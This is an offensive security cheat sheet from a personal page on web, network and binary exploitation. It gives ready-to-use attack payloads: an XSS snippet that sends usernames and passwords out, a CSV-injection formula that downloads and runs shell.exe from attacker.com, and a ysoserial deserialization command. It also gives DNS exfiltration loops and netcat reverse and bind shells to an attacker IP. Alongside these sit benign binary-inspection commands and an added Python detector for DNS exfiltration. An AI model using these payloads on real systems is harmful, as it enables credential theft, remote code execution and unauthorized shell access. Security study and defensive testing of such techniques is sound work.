Sahil Dhar - Application Security and Exploitation, all day every day.

    Web Exploitation

    1. [Payloads] Cross Site Scripting Attack

      • Exfiltrate the password (together with the username) via a jQuery Ajax GET request
      $.get("https://localhost/"+document.getElementsByName('username')[2].value+document.getElementsByName('password')[3].value,0);
      
      • Include an external JS script in a script context with jQuery Ajax

      Mainly useful when the allowed payload size is very restrictive; String.fromCharCode keeps the URL out of the literal payload

      $.getScript(String.fromCharCode(104,116,116,112,58,47,47,120,115,115,47,116,46,106,115),1)
      
    2. [Payloads] Deserialization Attacks

      • Dealing with the Runtime.exec() argument-splitting problem in blind Java deserialization
      java -jar ysoserial.jar CommonsCollections1 'sh -c $@|sh . echo ping $(whoami).<attacker.com>' | base64 | tr -d "\n"
      
    3. [Payloads] CSV Injection: out-of-band exploitation

      =cmd|' /C powershell Invoke-WebRequest "https://attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
      

    Network

    1. DNS Exfiltration

      • On the victim machine (Linux)
        for i in `ls`; do host $i.domain.com domain.com; done

      • On the attacker's machine (the -w option goes before the filter expression so the command is portable)
        tcpdump -vvv -s 0 -l -n -w dump dst host domain.com and dst port 53

      • To view only the exfiltrated data from the saved packet dump
        tcpdump -r dump | cut -d"?" -f2 | awk 'split($0,a,".domain"){print a[1]}' | sort -u
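
      Added example (not part of the original page): a Python parser for the `tcpdump -r dump` text shown above. It recovers the same labels as the awk pipeline, but matches the zone suffix exactly, and adds the defender-side view: which source host is asking for an unusual number of distinct names under one zone. The sample dump lines and the threshold are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample of `tcpdump -r dump -n` output for the capture above.
# These lines are made up for this example; they are not a real trace.
SAMPLE_DUMP = """\
12:00:01.000001 IP 10.0.0.5.41234 > 10.0.0.53.53: 1001+ A? passwd.domain.com. (33)
12:00:01.000101 IP 10.0.0.5.41235 > 10.0.0.53.53: 1002+ AAAA? passwd.domain.com. (33)
12:00:01.000201 IP 10.0.0.5.41236 > 10.0.0.53.53: 1003+ MX? passwd.domain.com. (33)
12:00:02.000001 IP 10.0.0.5.41237 > 10.0.0.53.53: 1004+ A? shadow.domain.com. (33)
12:00:03.000001 IP 10.0.0.7.50001 > 10.0.0.53.53: 2001+ A? www.domain.com. (30)
12:00:04.000001 IP 10.0.0.53.53 > 10.0.0.5.41234: 1001 NXDomain 0/1/0 (90)
"""

# One DNS query line: source IP (port stripped), destination port 53,
# query type and queried name.  Response lines do not match and are skipped.
QUERY_RE = re.compile(
    r"IP (?P<src>[\d.]+)\.\d+ > [\d.]+\.53: \d+\+ (?P<qtype>[A-Z]+)\? (?P<qname>\S+) \(\d+\)"
)


def parse_queries(dump_text, zone):
    """Yield (src_ip, qtype, label) for every query under `zone`; `label` is
    the name minus the zone suffix, matched exactly rather than on ".domain"."""
    suffix = "." + zone
    for line in dump_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        qname = m.group("qname").rstrip(".")
        if qname.endswith(suffix):
            yield m.group("src"), m.group("qtype"), qname[: -len(suffix)]


def exfiltrated_labels(dump_text, zone):
    """Unique labels in sorted order, the equivalent of `... | sort -u`."""
    return sorted({label for _, _, label in parse_queries(dump_text, zone)})


def flag_sources(dump_text, zone, threshold):
    """Detection view: hosts that queried at least `threshold` distinct labels
    under the zone.  A file listing pushed through `host` yields one label per
    file, so the count climbs far faster than for a normal client."""
    per_src = defaultdict(set)
    for src, _, label in parse_queries(dump_text, zone):
        per_src[src].add(label)
    return {src: len(v) for src, v in per_src.items() if len(v) >= threshold}
```

The threshold is a starting point for a DNS log or capture review; tune it against the zone's normal query volume before alerting on it.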
        
    2. Reverse and Bind shells

      • Reverse shell with traditional netcat [without the -e flag]
        /usr/bin/mknod /tmp/bp p; /bin/nc <attacker_ip> 1337 0</tmp/bp | /bin/sh 1>/tmp/bp

        /usr/bin/mkfifo /tmp/mf; /bin/nc <attacker_ip> 1337 < /tmp/mf | /bin/sh &>/tmp/mf

      • Bind shell with traditional netcat [without the -e flag]
        /usr/bin/mkfifo /tmp/bmf; nc -lk 1337 0< /tmp/bmf | /bin/sh &>/tmp/bmf
        
    3. Debugging Servers

      • HTTPS Server (Python 2 script; the BaseHTTPServer and SimpleHTTPServer modules became http.server in Python 3)
        # Generate a self-signed server certificate (private key and certificate in one PEM file)
        # openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
        # Run the server
        # python simple-https-server.py

        import BaseHTTPServer, SimpleHTTPServer
        import ssl

        # Serve the current directory over HTTPS on localhost:4443
        httpd = BaseHTTPServer.HTTPServer(('localhost', 4443), SimpleHTTPServer.SimpleHTTPRequestHandler)
        # Wrap the listening socket with TLS using the self-signed certificate generated above
        httpd.socket = ssl.wrap_socket(httpd.socket, certfile='./server.pem', server_side=True)
        httpd.serve_forever()

      • SMTP Server (prints every received message to stdout instead of delivering it; binding port 25 requires root)
        python -m smtpd -n -c DebuggingServer localhost:25
      

    Binary Exploitation

    1. Linux
      1. Find the offset of the "/bin/sh" string in libc
        strings -a -t x /lib/libc-2.11.2.so | grep "/bin/sh"

      2. Find ROP gadgets (instructions preceding a ret)
        objdump -d -M intel ./<binary.elf> | grep -B5 "ret"

      3. Check whether the stack is executable and find writable memory segments
        readelf -lS ./<binary.elf>

      4. Find the addresses of the Global Offset Table (GOT) entries (dynamic relocations)
        objdump -R ./<binary.elf>

      5. Get the entry point of an ELF file
        readelf -h ./<binary.elf>

      6. Get the file header, section headers and program headers
        readelf -e ./<binary.elf>
        

    Binary Protection Checks

      • Check whether shared objects carry debug information (file reports "stripped" or "not stripped")
        find . -type f -iname "*.so" -executable -exec echo -e "\r\n" \; -exec file {} \;

      • List the symbol information
        nm -an <binary_name>

      • Check whether the stack is executable with gdb-peda's checksec
        find . -type f -iname "*.so" -exec echo {} \; -exec gdb -q --batch -ex checksec -ex quit {} \;

      • Check whether the stack is executable with readelf (the GNU_STACK program header flags)
        find . -type f -iname "*.so" -exec echo {} \; -exec readelf -l {} \; | grep -i -A1 GNU_STACK

      • Check binary protections for binaries in iOS apps with rabin2 (radare2)
        find . -type f -executable -exec echo {} \; -exec sh -c "rabin2 -I {} | grep --color -E \"nx|pic|canary|relocs|stripped\"" \;
      

    MISC